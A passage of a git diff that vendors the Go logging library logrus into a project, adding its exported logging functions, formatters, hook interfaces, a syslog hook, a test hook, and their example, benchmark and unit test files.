logger.Out = &bytes.Buffer{} + entry := NewEntry(logger) + entry.WithField("err", errBoom).Panicf("kaboom %v", true) +} + +const ( + badMessage = "this is going to panic" + panicMessage = "this is broken" +) + +type panickyHook struct{} + +func (p *panickyHook) Levels() []Level { + return []Level{InfoLevel} +} + +func (p *panickyHook) Fire(entry *Entry) error { + if entry.Message == badMessage { + panic(panicMessage) + } + + return nil +} + +func TestEntryHooksPanic(t *testing.T) { + logger := New() + logger.Out = &bytes.Buffer{} + logger.Level = InfoLevel + logger.Hooks.Add(&panickyHook{}) + + defer func() { + p := recover() + assert.NotNil(t, p) + assert.Equal(t, panicMessage, p) + + entry := NewEntry(logger) + entry.Info("another message") + }() + + entry := NewEntry(logger) + entry.Info(badMessage) +} diff --git a/vendor/github.com/Sirupsen/logrus/example_basic_test.go b/vendor/github.com/Sirupsen/logrus/example_basic_test.go new file mode 100644 index 0000000000..a2acf550c9 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/example_basic_test.go @@ -0,0 +1,69 @@ +package logrus_test + +import ( + "github.com/sirupsen/logrus" + "os" +) + +func Example_basic() { + var log = logrus.New() + log.Formatter = new(logrus.JSONFormatter) + log.Formatter = new(logrus.TextFormatter) //default + log.Formatter.(*logrus.TextFormatter).DisableTimestamp = true // remove timestamp from test output + log.Level = logrus.DebugLevel + log.Out = os.Stdout + + // file, err := os.OpenFile("logrus.log", os.O_CREATE|os.O_WRONLY, 0666) + // if err == nil { + // log.Out = file + // } else { + // log.Info("Failed to log to file, using default stderr") + // } + + defer func() { + err := recover() + if err != nil { + entry := err.(*logrus.Entry) + log.WithFields(logrus.Fields{ + "omg": true, + "err_animal": entry.Data["animal"], + "err_size": entry.Data["size"], + "err_level": entry.Level, + "err_message": entry.Message, + "number": 100, + }).Error("The ice breaks!") // or use Fatal() to force the process to exit with a nonzero code + } + }() + + log.WithFields(logrus.Fields{ + "animal": "walrus", + "number": 8, + }).Debug("Started observing beach") + + log.WithFields(logrus.Fields{ + "animal": "walrus", + "size": 10, + }).Info("A group of walrus emerges from the ocean") + + log.WithFields(logrus.Fields{ + "omg": true, + "number": 122, + }).Warn("The group's number increased tremendously!") + + log.WithFields(logrus.Fields{ + "temperature": -4, + }).Debug("Temperature changes") + + log.WithFields(logrus.Fields{ + "animal": "orca", + "size": 9009, + }).Panic("It's over 9000!") + + // Output: + // level=debug msg="Started observing beach" animal=walrus number=8 + // level=info msg="A group of walrus emerges from the ocean" animal=walrus size=10 + // level=warning msg="The group's number increased tremendously!" number=122 omg=true + // level=debug msg="Temperature changes" temperature=-4 + // level=panic msg="It's over 9000!" animal=orca size=9009 + // level=error msg="The ice breaks!" err_animal=orca err_level=panic err_message="It's over 9000!" err_size=9009 number=100 omg=true +} diff --git a/vendor/github.com/Sirupsen/logrus/example_hook_test.go b/vendor/github.com/Sirupsen/logrus/example_hook_test.go new file mode 100644 index 0000000000..d4ddffca37 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/example_hook_test.go @@ -0,0 +1,35 @@ +package logrus_test + +import ( + "github.com/sirupsen/logrus" + "gopkg.in/gemnasium/logrus-airbrake-hook.v2" + "os" +) + +func Example_hook() { + var log = logrus.New() + log.Formatter = new(logrus.TextFormatter) // default + log.Formatter.(*logrus.TextFormatter).DisableTimestamp = true // remove timestamp from test output + log.Hooks.Add(airbrake.NewHook(123, "xyz", "development")) + log.Out = os.Stdout + + log.WithFields(logrus.Fields{ + "animal": "walrus", + "size": 10, + }).Info("A group of walrus emerges from the ocean") + + log.WithFields(logrus.Fields{ + "omg": true, + "number": 122, + }).Warn("The group's number increased tremendously!") + + log.WithFields(logrus.Fields{ + "omg": true, + "number": 100, + }).Error("The ice breaks!") + + // Output: + // level=info msg="A group of walrus emerges from the ocean" animal=walrus size=10 + // level=warning msg="The group's number increased tremendously!" number=122 omg=true + // level=error msg="The ice breaks!" number=100 omg=true +} diff --git a/vendor/github.com/Sirupsen/logrus/exported.go b/vendor/github.com/Sirupsen/logrus/exported.go new file mode 100644 index 0000000000..013183edab --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/exported.go @@ -0,0 +1,193 @@ +package logrus + +import ( + "io" +) + +var ( + // std is the name of the standard logger in stdlib `log` + std = New() +) + +func StandardLogger() *Logger { + return std +} + +// SetOutput sets the standard logger output. +func SetOutput(out io.Writer) { + std.mu.Lock() + defer std.mu.Unlock() + std.Out = out +} + +// SetFormatter sets the standard logger formatter. +func SetFormatter(formatter Formatter) { + std.mu.Lock() + defer std.mu.Unlock() + std.Formatter = formatter +} + +// SetLevel sets the standard logger level. +func SetLevel(level Level) { + std.mu.Lock() + defer std.mu.Unlock() + std.SetLevel(level) +} + +// GetLevel returns the standard logger level. +func GetLevel() Level { + std.mu.Lock() + defer std.mu.Unlock() + return std.level() +} + +// AddHook adds a hook to the standard logger hooks. +func AddHook(hook Hook) { + std.mu.Lock() + defer std.mu.Unlock() + std.Hooks.Add(hook) +} + +// WithError creates an entry from the standard logger and adds an error to it, using the value defined in ErrorKey as key. +func WithError(err error) *Entry { + return std.WithField(ErrorKey, err) +} + +// WithField creates an entry from the standard logger and adds a field to +// it. If you want multiple fields, use `WithFields`. +// +// Note that it doesn't log until you call Debug, Print, Info, Warn, Fatal +// or Panic on the Entry it returns. +func WithField(key string, value interface{}) *Entry { + return std.WithField(key, value) +} + +// WithFields creates an entry from the standard logger and adds multiple +// fields to it. This is simply a helper for `WithField`, invoking it +// once for each field. +// +// Note that it doesn't log until you call Debug, Print, Info, Warn, Fatal +// or Panic on the Entry it returns. +func WithFields(fields Fields) *Entry { + return std.WithFields(fields) +} + +// Debug logs a message at level Debug on the standard logger. +func Debug(args ...interface{}) { + std.Debug(args...) +} + +// Print logs a message at level Info on the standard logger. +func Print(args ...interface{}) { + std.Print(args...) +} + +// Info logs a message at level Info on the standard logger. +func Info(args ...interface{}) { + std.Info(args...) +} + +// Warn logs a message at level Warn on the standard logger. +func Warn(args ...interface{}) { + std.Warn(args...) +} + +// Warning logs a message at level Warn on the standard logger. +func Warning(args ...interface{}) { + std.Warning(args...) +} + +// Error logs a message at level Error on the standard logger. +func Error(args ...interface{}) { + std.Error(args...) +} + +// Panic logs a message at level Panic on the standard logger. +func Panic(args ...interface{}) { + std.Panic(args...) +} + +// Fatal logs a message at level Fatal on the standard logger. +func Fatal(args ...interface{}) { + std.Fatal(args...) +} + +// Debugf logs a message at level Debug on the standard logger. +func Debugf(format string, args ...interface{}) { + std.Debugf(format, args...) +} + +// Printf logs a message at level Info on the standard logger. +func Printf(format string, args ...interface{}) { + std.Printf(format, args...) +} + +// Infof logs a message at level Info on the standard logger. +func Infof(format string, args ...interface{}) { + std.Infof(format, args...) +} + +// Warnf logs a message at level Warn on the standard logger. +func Warnf(format string, args ...interface{}) { + std.Warnf(format, args...) +} + +// Warningf logs a message at level Warn on the standard logger. +func Warningf(format string, args ...interface{}) { + std.Warningf(format, args...) +} + +// Errorf logs a message at level Error on the standard logger. +func Errorf(format string, args ...interface{}) { + std.Errorf(format, args...) +} + +// Panicf logs a message at level Panic on the standard logger. +func Panicf(format string, args ...interface{}) { + std.Panicf(format, args...) +} + +// Fatalf logs a message at level Fatal on the standard logger. +func Fatalf(format string, args ...interface{}) { + std.Fatalf(format, args...) +} + +// Debugln logs a message at level Debug on the standard logger. +func Debugln(args ...interface{}) { + std.Debugln(args...) +} + +// Println logs a message at level Info on the standard logger. +func Println(args ...interface{}) { + std.Println(args...) +} + +// Infoln logs a message at level Info on the standard logger. +func Infoln(args ...interface{}) { + std.Infoln(args...) +} + +// Warnln logs a message at level Warn on the standard logger. +func Warnln(args ...interface{}) { + std.Warnln(args...) +} + +// Warningln logs a message at level Warn on the standard logger. +func Warningln(args ...interface{}) { + std.Warningln(args...) +} + +// Errorln logs a message at level Error on the standard logger. +func Errorln(args ...interface{}) { + std.Errorln(args...) +} + +// Panicln logs a message at level Panic on the standard logger. +func Panicln(args ...interface{}) { + std.Panicln(args...) +} + +// Fatalln logs a message at level Fatal on the standard logger. +func Fatalln(args ...interface{}) { + std.Fatalln(args...) +} diff --git a/vendor/github.com/Sirupsen/logrus/formatter.go b/vendor/github.com/Sirupsen/logrus/formatter.go new file mode 100644 index 0000000000..b183ff5b1d --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/formatter.go @@ -0,0 +1,45 @@ +package logrus + +import "time" + +const defaultTimestampFormat = time.RFC3339 + +// The Formatter interface is used to implement a custom Formatter. It takes an +// `Entry`. It exposes all the fields, including the default ones: +// +// * `entry.Data["msg"]`. The message passed from Info, Warn, Error .. +// * `entry.Data["time"]`. The timestamp. +// * `entry.Data["level"]. The level the entry was logged at. +// +// Any additional fields added with `WithField` or `WithFields` are also in +// `entry.Data`. Format is expected to return an array of bytes which are then +// logged to `logger.Out`. +type Formatter interface { + Format(*Entry) ([]byte, error) +} + +// This is to not silently overwrite `time`, `msg` and `level` fields when +// dumping it. If this code wasn't there doing: +// +// logrus.WithField("level", 1).Info("hello") +// +// Would just silently drop the user provided level. Instead with this code +// it'll logged as: +// +// {"level": "info", "fields.level": 1, "msg": "hello", "time": "..."} +// +// It's not exported because it's still using Data in an opinionated way. It's to +// avoid code duplication between the two default formatters. +func prefixFieldClashes(data Fields) { + if t, ok := data["time"]; ok { + data["fields.time"] = t + } + + if m, ok := data["msg"]; ok { + data["fields.msg"] = m + } + + if l, ok := data["level"]; ok { + data["fields.level"] = l + } +} diff --git a/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go b/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go new file mode 100644 index 0000000000..d9481589f5 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go @@ -0,0 +1,101 @@ +package logrus + +import ( + "fmt" + "testing" + "time" +) + +// smallFields is a small size data set for benchmarking +var smallFields = Fields{ + "foo": "bar", + "baz": "qux", + "one": "two", + "three": "four", +} + +// largeFields is a large size data set for benchmarking +var largeFields = Fields{ + "foo": "bar", + "baz": "qux", + "one": "two", + "three": "four", + "five": "six", + "seven": "eight", + "nine": "ten", + "eleven": "twelve", + "thirteen": "fourteen", + "fifteen": "sixteen", + "seventeen": "eighteen", + "nineteen": "twenty", + "a": "b", + "c": "d", + "e": "f", + "g": "h", + "i": "j", + "k": "l", + "m": "n", + "o": "p", + "q": "r", + "s": "t", + "u": "v", + "w": "x", + "y": "z", + "this": "will", + "make": "thirty", + "entries": "yeah", +} + +var errorFields = Fields{ + "foo": fmt.Errorf("bar"), + "baz": fmt.Errorf("qux"), +} + +func BenchmarkErrorTextFormatter(b *testing.B) { + doBenchmark(b, &TextFormatter{DisableColors: true}, errorFields) +} + +func BenchmarkSmallTextFormatter(b *testing.B) { + doBenchmark(b, &TextFormatter{DisableColors: true}, smallFields) +} + +func BenchmarkLargeTextFormatter(b *testing.B) { + doBenchmark(b, &TextFormatter{DisableColors: true}, largeFields) +} + +func BenchmarkSmallColoredTextFormatter(b *testing.B) { + doBenchmark(b, &TextFormatter{ForceColors: true}, smallFields) +} + +func BenchmarkLargeColoredTextFormatter(b *testing.B) { + doBenchmark(b, &TextFormatter{ForceColors: true}, largeFields) +} + +func BenchmarkSmallJSONFormatter(b *testing.B) { + doBenchmark(b, &JSONFormatter{}, smallFields) +} + +func BenchmarkLargeJSONFormatter(b *testing.B) { + doBenchmark(b, &JSONFormatter{}, largeFields) +} + +func doBenchmark(b *testing.B, formatter Formatter, fields Fields) { + logger := New() + + entry := &Entry{ + Time: time.Time{}, + Level: InfoLevel, + Message: "message", + Data: fields, + Logger: logger, + } + var d []byte + var err error + for i := 0; i < b.N; i++ { + d, err = formatter.Format(entry) + if err != nil { + b.Fatal(err) + } + b.SetBytes(int64(len(d))) + } +} diff --git a/vendor/github.com/Sirupsen/logrus/hook_test.go b/vendor/github.com/Sirupsen/logrus/hook_test.go new file mode 100644 index 0000000000..4fea7514e1 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hook_test.go @@ -0,0 +1,144 @@ +package logrus + +import ( + "sync" + "testing" + + "github.com/stretchr/testify/assert" +) + +type TestHook struct { + Fired bool +} + +func (hook *TestHook) Fire(entry *Entry) error { + hook.Fired = true + return nil +} + +func (hook *TestHook) Levels() []Level { + return []Level{ + DebugLevel, + InfoLevel, + WarnLevel, + ErrorLevel, + FatalLevel, + PanicLevel, + } +} + +func TestHookFires(t *testing.T) { + hook := new(TestHook) + + LogAndAssertJSON(t, func(log *Logger) { + log.Hooks.Add(hook) + assert.Equal(t, hook.Fired, false) + + log.Print("test") + }, func(fields Fields) { + assert.Equal(t, hook.Fired, true) + }) +} + +type ModifyHook struct { +} + +func (hook *ModifyHook) Fire(entry *Entry) error { + entry.Data["wow"] = "whale" + return nil +} + +func (hook *ModifyHook) Levels() []Level { + return []Level{ + DebugLevel, + InfoLevel, + WarnLevel, + ErrorLevel, + FatalLevel, + PanicLevel, + } +} + +func TestHookCanModifyEntry(t *testing.T) { + hook := new(ModifyHook) + + LogAndAssertJSON(t, func(log *Logger) { + log.Hooks.Add(hook) + log.WithField("wow", "elephant").Print("test") + }, func(fields Fields) { + assert.Equal(t, fields["wow"], "whale") + }) +} + +func TestCanFireMultipleHooks(t *testing.T) { + hook1 := new(ModifyHook) + hook2 := new(TestHook) + + LogAndAssertJSON(t, func(log *Logger) { + log.Hooks.Add(hook1) + log.Hooks.Add(hook2) + + log.WithField("wow", "elephant").Print("test") + }, func(fields Fields) { + assert.Equal(t, fields["wow"], "whale") + assert.Equal(t, hook2.Fired, true) + }) +} + +type ErrorHook struct { + Fired bool +} + +func (hook *ErrorHook) Fire(entry *Entry) error { + hook.Fired = true + return nil +} + +func (hook *ErrorHook) Levels() []Level { + return []Level{ + ErrorLevel, + } +} + +func TestErrorHookShouldntFireOnInfo(t *testing.T) { + hook := new(ErrorHook) + + LogAndAssertJSON(t, func(log *Logger) { + log.Hooks.Add(hook) + log.Info("test") + }, func(fields Fields) { + assert.Equal(t, hook.Fired, false) + }) +} + +func TestErrorHookShouldFireOnError(t *testing.T) { + hook := new(ErrorHook) + + LogAndAssertJSON(t, func(log *Logger) { + log.Hooks.Add(hook) + log.Error("test") + }, func(fields Fields) { + assert.Equal(t, hook.Fired, true) + }) +} + +func TestAddHookRace(t *testing.T) { + var wg sync.WaitGroup + wg.Add(2) + hook := new(ErrorHook) + LogAndAssertJSON(t, func(log *Logger) { + go func() { + defer wg.Done() + log.AddHook(hook) + }() + go func() { + defer wg.Done() + log.Error("test") + }() + wg.Wait() + }, func(fields Fields) { + // the line may have been logged + // before the hook was added, so we can't + // actually assert on the hook + }) +} diff --git a/vendor/github.com/Sirupsen/logrus/hooks.go b/vendor/github.com/Sirupsen/logrus/hooks.go new file mode 100644 index 0000000000..3f151cdc39 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks.go @@ -0,0 +1,34 @@ +package logrus + +// A hook to be fired when logging on the logging levels returned from +// `Levels()` on your implementation of the interface. Note that this is not +// fired in a goroutine or a channel with workers, you should handle such +// functionality yourself if your call is non-blocking and you don't wish for +// the logging calls for levels returned from `Levels()` to block. +type Hook interface { + Levels() []Level + Fire(*Entry) error +} + +// Internal type for storing the hooks on a logger instance. +type LevelHooks map[Level][]Hook + +// Add a hook to an instance of logger. This is called with +// `log.Hooks.Add(new(MyHook))` where `MyHook` implements the `Hook` interface. +func (hooks LevelHooks) Add(hook Hook) { + for _, level := range hook.Levels() { + hooks[level] = append(hooks[level], hook) + } +} + +// Fire all the hooks for the passed level. Used by `entry.log` to fire +// appropriate hooks for a log entry. +func (hooks LevelHooks) Fire(level Level, entry *Entry) error { + for _, hook := range hooks[level] { + if err := hook.Fire(entry); err != nil { + return err + } + } + + return nil +} diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md b/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md new file mode 100644 index 0000000000..1bbc0f72d3 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md @@ -0,0 +1,39 @@ +# Syslog Hooks for Logrus :walrus: + +## Usage + +```go +import ( + "log/syslog" + "github.com/sirupsen/logrus" + lSyslog "github.com/sirupsen/logrus/hooks/syslog" +) + +func main() { + log := logrus.New() + hook, err := lSyslog.NewSyslogHook("udp", "localhost:514", syslog.LOG_INFO, "") + + if err == nil { + log.Hooks.Add(hook) + } +} +``` + +If you want to connect to local syslog (Ex. "/dev/log" or "/var/run/syslog" or "/var/run/log"). Just assign empty string to the first two parameters of `NewSyslogHook`. It should look like the following. + +```go +import ( + "log/syslog" + "github.com/sirupsen/logrus" + lSyslog "github.com/sirupsen/logrus/hooks/syslog" +) + +func main() { + log := logrus.New() + hook, err := lSyslog.NewSyslogHook("", "", syslog.LOG_INFO, "") + + if err == nil { + log.Hooks.Add(hook) + } +} +``` diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go new file mode 100644 index 0000000000..329ce0d60c --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go @@ -0,0 +1,55 @@ +// +build !windows,!nacl,!plan9 + +package syslog + +import ( + "fmt" + "log/syslog" + "os" + + "github.com/sirupsen/logrus" +) + +// SyslogHook to send logs via syslog. +type SyslogHook struct { + Writer *syslog.Writer + SyslogNetwork string + SyslogRaddr string +} + +// Creates a hook to be added to an instance of logger. This is called with +// `hook, err := NewSyslogHook("udp", "localhost:514", syslog.LOG_DEBUG, "")` +// `if err == nil { log.Hooks.Add(hook) }` +func NewSyslogHook(network, raddr string, priority syslog.Priority, tag string) (*SyslogHook, error) { + w, err := syslog.Dial(network, raddr, priority, tag) + return &SyslogHook{w, network, raddr}, err +} + +func (hook *SyslogHook) Fire(entry *logrus.Entry) error { + line, err := entry.String() + if err != nil { + fmt.Fprintf(os.Stderr, "Unable to read entry, %v", err) + return err + } + + switch entry.Level { + case logrus.PanicLevel: + return hook.Writer.Crit(line) + case logrus.FatalLevel: + return hook.Writer.Crit(line) + case logrus.ErrorLevel: + return hook.Writer.Err(line) + case logrus.WarnLevel: + return hook.Writer.Warning(line) + case logrus.InfoLevel: + return hook.Writer.Info(line) + case logrus.DebugLevel: + return hook.Writer.Debug(line) + default: + return nil + } +} + +func (hook *SyslogHook) Levels() []logrus.Level { + return logrus.AllLevels +} diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go new file mode 100644 index 0000000000..5ec3a44454 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go @@ -0,0 +1,27 @@ +package syslog + +import ( + "log/syslog" + "testing" + + "github.com/sirupsen/logrus" +) + +func TestLocalhostAddAndPrint(t *testing.T) { + log := logrus.New() + hook, err := NewSyslogHook("udp", "localhost:514", syslog.LOG_INFO, "") + + if err != nil { + t.Errorf("Unable to connect to local syslog.") + } + + log.Hooks.Add(hook) + + for _, level := range hook.Levels() { + if len(log.Hooks[level]) != 1 { + t.Errorf("SyslogHook was not added. The length of log.Hooks[%v]: %v", level, len(log.Hooks[level])) + } + } + + log.Info("Congratulations!") +} diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test.go b/vendor/github.com/Sirupsen/logrus/hooks/test/test.go new file mode 100644 index 0000000000..62c4845df7 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks/test/test.go @@ -0,0 +1,95 @@ +// The Test package is used for testing logrus. It is here for backwards +// compatibility from when logrus' organization was upper-case. Please use +// lower-case logrus and the `null` package instead of this one. +package test + +import ( + "io/ioutil" + "sync" + + "github.com/sirupsen/logrus" +) + +// Hook is a hook designed for dealing with logs in test scenarios. +type Hook struct { + // Entries is an array of all entries that have been received by this hook. + // For safe access, use the AllEntries() method, rather than reading this + // value directly. + Entries []*logrus.Entry + mu sync.RWMutex +} + +// NewGlobal installs a test hook for the global logger. +func NewGlobal() *Hook { + + hook := new(Hook) + logrus.AddHook(hook) + + return hook + +} + +// NewLocal installs a test hook for a given local logger. +func NewLocal(logger *logrus.Logger) *Hook { + + hook := new(Hook) + logger.Hooks.Add(hook) + + return hook + +} + +// NewNullLogger creates a discarding logger and installs the test hook. +func NewNullLogger() (*logrus.Logger, *Hook) { + + logger := logrus.New() + logger.Out = ioutil.Discard + + return logger, NewLocal(logger) + +} + +func (t *Hook) Fire(e *logrus.Entry) error { + t.mu.Lock() + defer t.mu.Unlock() + t.Entries = append(t.Entries, e) + return nil +} + +func (t *Hook) Levels() []logrus.Level { + return logrus.AllLevels +} + +// LastEntry returns the last entry that was logged or nil. +func (t *Hook) LastEntry() *logrus.Entry { + t.mu.RLock() + defer t.mu.RUnlock() + i := len(t.Entries) - 1 + if i < 0 { + return nil + } + // Make a copy, for safety + e := *t.Entries[i] + return &e +} + +// AllEntries returns all entries that were logged. +func (t *Hook) AllEntries() []*logrus.Entry { + t.mu.RLock() + defer t.mu.RUnlock() + // Make a copy so the returned value won't race with future log requests + entries := make([]*logrus.Entry, len(t.Entries)) + for i, entry := range t.Entries { + // Make a copy, for safety + e := *entry + entries[i] = &e + } + return entries +} + +// Reset removes all Entries from this test hook. +func (t *Hook) Reset() { + t.mu.Lock() + defer t.mu.Unlock() + t.Entries = make([]*logrus.Entry, 0) +} diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go b/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go new file mode 100644 index 0000000000..dea768e6c5 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go @@ -0,0 +1,61 @@ +package test + +import ( + "sync" + "testing" + + "github.com/sirupsen/logrus" + "github.com/stretchr/testify/assert" +) + +func TestAllHooks(t *testing.T) { + assert := assert.New(t) + + logger, hook := NewNullLogger() + assert.Nil(hook.LastEntry()) + assert.Equal(0, len(hook.Entries)) + + logger.Error("Hello error") + assert.Equal(logrus.ErrorLevel, hook.LastEntry().Level) + assert.Equal("Hello error", hook.LastEntry().Message) + assert.Equal(1, len(hook.Entries)) + + logger.Warn("Hello warning") + assert.Equal(logrus.WarnLevel, hook.LastEntry().Level) + assert.Equal("Hello warning", hook.LastEntry().Message) + assert.Equal(2, len(hook.Entries)) + + hook.Reset() + assert.Nil(hook.LastEntry()) + assert.Equal(0, len(hook.Entries)) + + hook = NewGlobal() + + logrus.Error("Hello error") + assert.Equal(logrus.ErrorLevel, hook.LastEntry().Level) + assert.Equal("Hello error", hook.LastEntry().Message) + assert.Equal(1, len(hook.Entries)) +} + +func TestLoggingWithHooksRace(t *testing.T) { + assert := assert.New(t) + logger, hook := NewNullLogger() + + var wg sync.WaitGroup + wg.Add(100) + + for i := 0; i < 100; i++ { + go func() { + logger.Info("info") + wg.Done() + }() + } + + assert.Equal(logrus.InfoLevel, hook.LastEntry().Level) + assert.Equal("info", hook.LastEntry().Message) + + wg.Wait() + + entries := hook.AllEntries() + assert.Equal(100, len(entries)) +} diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter.go b/vendor/github.com/Sirupsen/logrus/json_formatter.go new file mode 100644 index 0000000000..fb01c1b104 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/json_formatter.go @@ -0,0 +1,79 @@ +package logrus + +import ( + "encoding/json" + "fmt" +) + +type fieldKey string + +// FieldMap allows customization of the key names for default fields. +type FieldMap map[fieldKey]string + +// Default key names for the default fields +const ( + FieldKeyMsg = "msg" + FieldKeyLevel = "level" + FieldKeyTime = "time" +) + +func (f FieldMap) resolve(key fieldKey) string { + if k, ok := f[key]; ok { + return k + } + + return string(key) +} + +// JSONFormatter formats logs into parsable json +type JSONFormatter struct { + // TimestampFormat sets the format used for marshaling timestamps. + TimestampFormat string + + // DisableTimestamp allows disabling automatic timestamps in output + DisableTimestamp bool + + // FieldMap allows users to customize the names of keys for default fields. + // As an example: + // formatter := &JSONFormatter{ + // FieldMap: FieldMap{ + // FieldKeyTime: "@timestamp", + // FieldKeyLevel: "@level", + // FieldKeyMsg: "@message", + // }, + // } + FieldMap FieldMap +} + +// Format renders a single log entry +func (f *JSONFormatter) Format(entry *Entry) ([]byte, error) { + data := make(Fields, len(entry.Data)+3) + for k, v := range entry.Data { + switch v := v.(type) { + case error: + // Otherwise errors are ignored by `encoding/json` + // https://github.com/sirupsen/logrus/issues/137 + data[k] = v.Error() + default: + data[k] = v + } + } + prefixFieldClashes(data) + + timestampFormat := f.TimestampFormat + if timestampFormat == "" { + timestampFormat = defaultTimestampFormat + } + + if !f.DisableTimestamp { + data[f.FieldMap.resolve(FieldKeyTime)] = entry.Time.Format(timestampFormat) + } + data[f.FieldMap.resolve(FieldKeyMsg)] = entry.Message + data[f.FieldMap.resolve(FieldKeyLevel)] = entry.Level.String() + + serialized, err := json.Marshal(data) + if err != nil { + return nil, fmt.Errorf("Failed to marshal fields to JSON, %v", err) + } + return append(serialized, '\n'), nil +} diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter_test.go b/vendor/github.com/Sirupsen/logrus/json_formatter_test.go new file mode 100644 index 0000000000..51093a79ba --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/json_formatter_test.go @@ -0,0 +1,199 @@ +package logrus + +import ( + "encoding/json" + "errors" + "strings" + "testing" +) + +func TestErrorNotLost(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("error", errors.New("wild walrus"))) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + entry := make(map[string]interface{}) + err = json.Unmarshal(b, &entry) + if err != nil { + t.Fatal("Unable to unmarshal formatted entry: ", err) + } + + if entry["error"] != "wild walrus" { + t.Fatal("Error field not set") + } +} + +func TestErrorNotLostOnFieldNotNamedError(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("omg", errors.New("wild walrus"))) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + entry := make(map[string]interface{}) + err = json.Unmarshal(b, &entry) + if err != nil { + t.Fatal("Unable to unmarshal formatted entry: ", err) + } + + if entry["omg"] != "wild walrus" { + t.Fatal("Error field not set") + } +} + +func TestFieldClashWithTime(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("time", "right now!")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + entry := make(map[string]interface{}) + err = json.Unmarshal(b, &entry) + if err != nil { + t.Fatal("Unable to unmarshal formatted entry: ", err) + } + + if entry["fields.time"] != "right now!" { + t.Fatal("fields.time not set to original time field") + } + + if entry["time"] != "0001-01-01T00:00:00Z" { + t.Fatal("time field not set to current time, was: ", entry["time"]) + } +} + +func TestFieldClashWithMsg(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("msg", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + entry := make(map[string]interface{}) + err = json.Unmarshal(b, &entry) + if err != nil { + t.Fatal("Unable to unmarshal formatted entry: ", err) + } + + if entry["fields.msg"] != "something" { + t.Fatal("fields.msg not set to original msg field") + } +} + +func TestFieldClashWithLevel(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + entry := make(map[string]interface{}) + err = json.Unmarshal(b, &entry) + if err != nil { + t.Fatal("Unable to unmarshal formatted entry: ", err) + } + + if entry["fields.level"] != "something" { + t.Fatal("fields.level not set to original level field") + } +} + +func TestJSONEntryEndsWithNewline(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + + if b[len(b)-1] != '\n' { + t.Fatal("Expected JSON log entry to end with a newline") + } +} + +func TestJSONMessageKey(t *testing.T) { + formatter := &JSONFormatter{ + FieldMap: FieldMap{ + FieldKeyMsg: "message", + }, + } + + b, err := formatter.Format(&Entry{Message: "oh hai"}) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + s := string(b) + if !(strings.Contains(s, "message") && strings.Contains(s, "oh hai")) { + t.Fatal("Expected JSON to format message key") + } +} + +func TestJSONLevelKey(t *testing.T) { + formatter := &JSONFormatter{ + FieldMap: FieldMap{ + FieldKeyLevel: "somelevel", + }, + } + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + s := string(b) + if !strings.Contains(s, "somelevel") { + t.Fatal("Expected JSON to format level key") + } +} + +func TestJSONTimeKey(t *testing.T) { + formatter := &JSONFormatter{ + FieldMap: FieldMap{ + FieldKeyTime: "timeywimey", + }, + } + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + s := string(b) + if !strings.Contains(s, "timeywimey") { + t.Fatal("Expected JSON to format time key") + } +} + +func TestJSONDisableTimestamp(t *testing.T) { + formatter := &JSONFormatter{ + DisableTimestamp: true, + } + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + s := string(b) + if strings.Contains(s, FieldKeyTime) { + t.Error("Did not prevent timestamp", s) + } +} + +func TestJSONEnableTimestamp(t *testing.T) { + formatter := &JSONFormatter{} + + b, err := formatter.Format(WithField("level", "something")) + if err != nil { + t.Fatal("Unable to format entry: ", err) + } + s := string(b) + if !strings.Contains(s, FieldKeyTime) { + t.Error("Timestamp not present", s) + } +} diff --git a/vendor/github.com/Sirupsen/logrus/logger.go b/vendor/github.com/Sirupsen/logrus/logger.go new file mode 100644 index 0000000000..fdaf8a6534 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/logger.go @@ -0,0 +1,323 @@ +package logrus + +import ( + "io" + "os" + "sync" + "sync/atomic" +) + +type Logger struct { + // The logs are `io.Copy`'d to this in 